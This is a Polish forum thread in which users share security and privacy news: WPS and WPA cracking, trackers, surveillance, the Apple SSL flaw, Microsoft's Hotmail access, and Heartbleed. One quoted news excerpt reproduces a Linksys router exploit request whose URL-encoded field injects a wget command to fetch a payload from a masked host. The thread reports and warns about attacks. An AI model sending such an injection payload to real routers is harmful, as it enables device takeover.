Takie tam o bezpieczeństwie i prywatności

[Berion]

Problem znika w przypadku dodatkowych źródeł entropii.

[chris996]

Temat o bezpieczeństwie to dorzucę coś od siebie. Info przydatne dla osób co szyfrują sieć WIFI.
Jakiś czas temu przed świętami bawiłem się w hakowanie własnej sieci WIFI (szyfrowanie WPA2) i trafiłem na taki artykuł:
Reaver ***8211; program do hackowania Wi-Fi WPA/WPA2 (poprzez dziurę w WPS)

Tak jak napisano w artykule, dzięki programowi Reaver możliwe jest uzyskanie kluczy WPA/WPA2, jeśli ruter ma włączony WPS.
U mnie w TP-LINK mam QSS.
Cóż, nawet taką sieć WIFI z WPA2, można z łatwością złamać i szyfrowanie WPA2 w takim przypadku nic nie daje

[andy]

Dodatkowo należy dodać, że jak ktoś ma słaby główny klucz to też złamanie tego nie jest trudne Wystarczy przechwycić hendszejka i kilka dni zabawy ze słownikiem (mam ok 14mln słów ) + brute force na krótkie frazy, łatwe frazy

[sobrus]

Było już na forum, ale w tym temacie nie.
Jeżeli komuś zależy na odrobinie prywatności w internecie.
To jest fajny dodatek do przeglądarek:

Ghostery

Jak się okazuje nie ma już praktycznie stron bez zamontowanego tropiciela ....
Większość ma po kilka.

[andy]

Cytat:

W dniu 30 stycznia 2014 r. Sąd Apelacyjny we Wrocławiu (sygn. akt I ACa 1452/13) rozstrzygnął prawomocnie ten istotny spór ***8211; oddalając apelację powoda i w efekcie przyznając słuszność administratorowi portalu.

Cytat:

Spór toczył się przez blisko 3 lata. Sporne, czarno-białe zdjęcia (zrobione w szkole podstawowej, ponad 30 lat temu) zostały zamieszczone w portalu przez byłych uczniów klasy, do której uczęszczał również powód. Jedno ze zdjęć zostało opatrzone podpisem, w którym inny użytkownik portalu wskazał imiona i nazwiska niektórych uwiecznionych na nim osób.
Powód dochodząc usunięcia swojego wizerunku z portalu powoływał się na ochronę wynikającą z prawa autorskiego, z regulacji dotyczących danych osobowych oraz wreszcie na przepisy dotyczące dóbr osobistych.

Cytat:

Czekając na pisemne uzasadnienie orzeczenia Sadu Apelacyjnego, jako podsumowanie można przytoczyć słowa Sądu Okręgowego we Wrocławiu, który orzekając w I instancji stwierdził ***8211; ***8222;Mówiąc potocznie, nic złego się nie stało i stać się nie mogło***8221;.

http://www.olesinski.com/spor-o-publ...ie-zakonczony/

--

Cytat:

Polska występuje na liście 21 krajów, w których zlokalizowano serwery odbierające ruch z inwigilowanych komputerów. Występujemy w zaszczytnym gronie krajów takich jak Kolumbia, Panama, Oman, Arabia Saudyjska, Zjednoczone Emiraty Arabskie, Egipt, Etiopia, Maroko, Sudan, Nigeria, Kazachstan, Azerbejdżan, Malezja, Tajlandia, Uzbekistan, Włochy, Węgry, Meksyk i Korea Południowa.

http://zaufanatrzeciastrona.pl/post/...cego-obywateli

Cytat:

Na czym polega atak

Odkryto, że nie dość, że jeden z parametrów skryptu obsługującego blokowanie i odblokowywanie stron dostępnych za pomocą rutera jest podatny na wstrzyknięcie dowolnego polecenia powłoki, to na dokładkę wykonanie tego skryptu odbywa się bez weryfikacji uprawnień użytkownika.
Przykładowy atak wygląda tak:
POST /tmUnblock.cgi HTTP/1.1 Host: 192.168.0.1:8080 User-Agent: Mozilla/4.0 (compatible; MSIE 4.01; Mac_PowerPC) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.0.1:8080/ Authorization: Basic YWRtaW46JmkxKkBVJDZ4dmNH Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 518 %73%75%62%6d%69%74%5f%62%75%74%74%6f%6e%3d&%63%68% 61%6e%67%65%5f%61%63 %74%69%6f%6e%3d&%73%75%62%6d%69%74%5f%74%79%70%65% 3d&%61%63%74%69%6f %6e%3d&%63%6f%6d%6d%69%74%3d%30&%74%74%63%70%5f%6e %75%6d%3d%32&%74%74 %63%70%5f%73%69%7a%65%3d%32&%74%74%63%70%5f%69%70% 3d%2d%68%20%60%63 %64%20%2f%74%6d%70%3b%69%66%20%5b%20%21%20%2d%65%2 0%2e%4c%32%36%20 %5d%3b%74%68%65%6e%20%77%67%65%74%20%68%74%74%70%3 a%2f%2f%xx%xx%2e %xx%xx%xx%2e%xx%xx%xx%2e%xx%xx%xx%3a%31%39%33%2f%3 0%52%78%2e%6d%69 %64%3b%66%69%60&%53%74%61%72%74%45%50%49%3d%31 Autoryzacja co prawda jest wymagana, jednak hasło podane przez użytkownika nie jest weryfikowane.

http://zaufanatrzeciastrona.pl/post/...terow-linksysa

[chris996]

Ku przestrodze:

Stracił 16 000 PLN bo miał dziurawy router.
Prawie 1,2 miliona Polaków może być podatnych na ten atak!

[gallus]

Ja trafiłem na razie podmienione dns-y tylko u jednego ze znajomych, całe szczęście orange się zorientowało i blokowało ruch po podmianie.

[sobrus]

Jak o tym przeczytalem (mam Neostrade) to puscilem caly ruch przez proxy z na sztywno wpisanym opendns . Bardzo niefajna wpadka , a z aktualizacjami nikt sie nie spieszy.

[andy]

Cytat:

Niepokojąca sugestia o błędzie w obsłudze SSL w produktach Apple

04 marca 2014, 10:14 | Aktualności | Komentarze: 4
Tagi: Apple, iOS, SSL
Niedawno na blogu Bruce Schneiera znalazł się wpis ***8220;Was the iOS SSL Flaw Deliberate?***8221; Zastanawia się w nim, czy poważny błąd dotyczący SSL na pewno pojawił się na skutek pomyłki. Twierdzi, że idealna tylna furtka (backdoor) w oprogramowaniu powinna mieć trzy cechy:

• niskie prawdopodobieństwo wykrycia,
• łatwość wyparcia się jej autorstwa w przypadku ujawnienia,
• małe wymagania odnośnie udziału innych osób w przedsięwzięciu.

Według autora, błąd w obsłudze SSL spełnia te warunki, jeśli założymy iż powstał celowo. Pewna instrukcja w jednym miejscu została wpisana dwukrotnie. Jednak wykonanie pierwszej z nich było opatrzone warunkiem, natomiast druga była bezwarunkowa. Ten fragment kodu zawierał kolejne instrukcje warunkowe, które z powodu wspomnianego błędu już nie były wykonywane i pozwalały na przeprowadzenie ataku na zestawianie szyfrowanego połączenia.

http://sekurak.pl/niepokojaca-sugest...duktach-apple/



---


iPhone 5s śledzi Twój ruch nawet po wyłączeniu urządzenia

Cytat:

Samo śledzenie ruchu jest ciekawą funkcjonalnością dostępną w najnowszych iPhone***8217;ach ***8211; przydaje się choćby przy współpracy z aplikacjami ułatwiającymi zapis i analizę aktywności ruchowej / tworzeniu planów fitness itp. Kto by jednak pomyślał, że także po wyłączeniu, telefon również zapisuje pewne informacje o ruchu użytkownika***8230;
Taką właśnie ciekawostką podzielił się na reddicie jeden z posiadaczy iPhone 5s. Najpierw zepsuł mu się kabel do zasilania telefonu, więc przez pełne 4 dni telefon był wyłączony (rozładowana bateria). Ale o dziwo, po naładowaniu urządzenia, skomunikowało się ono z oprogramowaniem liczącym kroki ***8211; udostępniając pełne statystyki za 4 dni podczas których ***8216;nie było zasilania***8217;.
Użytkownik wykorzystywał przy tym jedną z aplikacji (Argus) umożliwiającą komunikację z dedykowanym procesorem ruchu M7 (dostępnym w iPhone 5S) , który rzeczywiście potrafi działać w środowisku ***8216;low power level***8216;. ;-)

http://sekurak.pl/iphone-5s-sledzi-t...iu-urzadzenia/


----
Apple recently made a booboo, unlike any other booboo in the history of programming. Even though Apple***8217;s bug is unprecedented, here***8217;s a brief overview of some predecessor bugs.

http://www.tedunangst.com/flak/post/...one-line-fixes

[andy]

Cytat:

CHIPSEC: Platform Security Assessment Framework
CHIPSEC is a framework for analyzing security of PC platforms including hardware, system firmware including BIOS/UEFI and the configuration of platform components. It allows creating security test suite, security assessment tools for various low level components and interfaces as well as forensic capabilities for firmware
CHIPSEC can run on any of these environments:

1. Windows (client and server)
2. Linux
3. UEFI Shell

NOTE: This software is for security testing purposes. Use at your own risk.

https://github.com/chipsec/chipsec

[andy]

Z pozdrowieniami dla wszystkich, którzy przesiedli się z konta GMail na Outlooka/Hotmail z myślą, że ta firma jest "lepsza"

Cytat:

Wczoraj aresztowano pracownika Microsoftu, który sfrustrowany wynikami oceny przesłał francuskiemu blogerowi fragmenty Windows 8 przed premierą systemu. Microsoft wytropił sprawcę wycieku analizując konto Hotmail blogera.

Cytat:

Teraz czas na prawdziwą wisienkę na torcie, mianowicie odpowiedź na pytanie, jakim prawem Microsoft zajrzał do prywatnej skrzynki niezależnego blogera. Otóż mógł w tym celu skorzystać z odpowiedniego zapisu w regulaminie usługi, którego nikt nie czyta, ale wszyscy akceptują. Punkt 5.2 mówi:

Does Microsoft disclose my personal information outside of Microsoft? You consent and agree that Microsoft may access, disclose, or preserve information associated with your use of the services, including (without limitation) your personal information and content, or information that Microsoft acquires about you through your use of the services (such as IP address or other third-party information) when Microsoft forms a good faith belief that doing so is necessary (a) to comply with applicable law or to respond to legal process from competent authorities; (b) to enforce this agreement or protect the rights or property of Microsoft or our customers; or (c) to help prevent a loss of life or serious physical injury to anyone.

W skrócie: Użytkownik wyraża zgodę na na przetwarzanie wszystkich informacji na jego temat, które posiada Microsoft, m. in. w celu ochrony praw lub własności Microsoftu. Wygląda za to, że choć oburzające, to działania Microsoftu miały pokrycie we wcześniejszej zgodzie, wyrażonej przez użytkownika.

http://zaufanatrzeciastrona.pl/post/...konto-hotmaila

[andy]

Raczej oczywista oczywistość

Cytat:

Orange szpieguje swoich klientów i współpracuje z agencjami wywiadowczymi





Jak wynika z najnowszych doniesień, największy francuski koncern telekomunikacyjny - Orange - udostępnia informacje o swoich klientach służbom wywiadowczym. Pojawiają się również stwierdzenia, że odbywa się to... bez jakiejkolwiek formy kontroli.

Informacje opublikował jeden z większych, francuskich dzienników. Według danych zaczerpniętych z należącego do brytyjskiej agencji Government Communications Headquarters dokumentu Orange już od lat współpracuje z francuską agencją wywiadu wojskowego i strategicznego, udostępniając jej dane generowane przez swoich klientów (np. wiadomości SMS).

http://www.conowego.pl/aktualnosci/o...owczymi-11360/

----

Huawei zhakowane?
http://niebezpiecznik.pl/post/nsa-zhackowalo-huawei/

[sobrus]

Cytat:

Napisany przez andy

Z pozdrowieniami dla wszystkich, którzy przesiedli się z konta GMail na Outlooka/Hotmail z myślą, że ta firma jest "lepsza"

Ja i tak od nich uciekam. Nie dość że cały serwis pracuje według mnie jakoś wolniej od gmaila, to jeszcze raz na jakiś czas prosi o zalogowanie się na konto i wpisanie captcha (inaczej tracimy możliwość wysyłania poczty).
Oczywiście wysyłana wiadomość przepada (!). Przynajmniej w thunderbirdzie.

Korzystanie z programów pocztowych to udręka, przereklamowany ten outlook.

[kid86]

Ewentualnie mo***380;na korzysta***263; z sieci TOR, jednak chodzi to bardzo topornie.

[andy]

Dobrze jest mieć oddzielne hasła do serwisów (:

Cytat:

Większość z Was pewnie czytała już o najnowszym błędzie w OpenSSL. Zagrożenie nie jest teoretyczne ***8211; mamy dowody na to, że hasła użytkowników największych polskich i światowych serwisów wyciekały lub nadal wyciekają.
Błąd, nazwany Heartbleed, polega na wysyłaniu przez serwer własnej pamięci w porcjach po 64 kilobajty w odpowiedzi na każde odpowiednio skonstruowane zapytanie. Pamięć pochodzi z właśnie uwolnionego obszaru procesu Op

http://zaufanatrzeciastrona.pl/post/...miencie-hasla/